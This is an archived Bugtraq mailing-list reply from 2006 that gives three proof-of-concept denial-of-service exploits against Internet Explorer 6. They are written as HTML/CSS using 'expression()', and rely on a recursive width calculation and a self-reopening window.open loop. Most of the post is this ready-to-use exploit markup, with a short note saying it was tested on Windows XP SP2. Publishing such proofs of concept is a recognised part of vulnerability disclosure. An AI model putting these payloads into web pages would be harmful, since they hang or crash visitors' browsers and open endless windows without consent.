Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
From: José Carlos Nieto Jarquín <xiam.core@xxxxxxxxx>
Date: Wed, 06 Dec 2006 01:01:10 -0600
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=W5lMoAJChYc7oisCL/0ujWLYjDqKLd2ea1Eih9R7XKyixT45gGkem3Jub+k5oXR2FTciOjkAAvZA/zyk8Z0+73FOlKpI4DoAEeAM1/ADFTqZDORFtaWJS7mKeO5IdVTreAe1QIbmmTV4JCsZ8EDfWIhLmqlm1CANsxjnT/0DLAo=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 1.5.0.8 (X11/20061025)

Note:
I'm sorry, two of the the exploits in the prior e-mail were incomplete.

This is just another couple of proof of concept exploits for thiswell-known browser. The third one is a lame combination of both.


Tested under Windows XP SP2, MSIE 6.0.2900.2180

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">

<table style="border: 1px solid red; width:expression(document.getElementById('foo').offsetWidth+'px');">

   <tr><td></td></tr>
   </table>
</div>


Exploit 2
<div style="width: expression(window.open(self.location));">
   &nbsp;
</div>

Exploit 3
<html>
   <head>
       <title>Another non-standards compliant IE D.O.S.</title>
   </head>
   <body>
       <div id="foo" style="height: 20px; border: 1px solid blue">

<table style="border: 1px solid red; width:expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">

           <tr>
               <td>
                   IE makes my life harder :(. It sucks, don't use it :).
               </td>
           </tr>
           </table>
       </div>
       Written by <a href="http://xiam.be";>xiam</a>.<br />
       Tested under IE 6.0.2900.2180
   </body>
</html>

--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be

Follow-Ups:
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
  - From: Andrius Paurys

Prev by Date: Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)
Next by Date: Uploadscript Vulnerabilities: Text file Hash password
Previous by thread: Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)
Next by thread: Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Index(es):
- Date
- Thread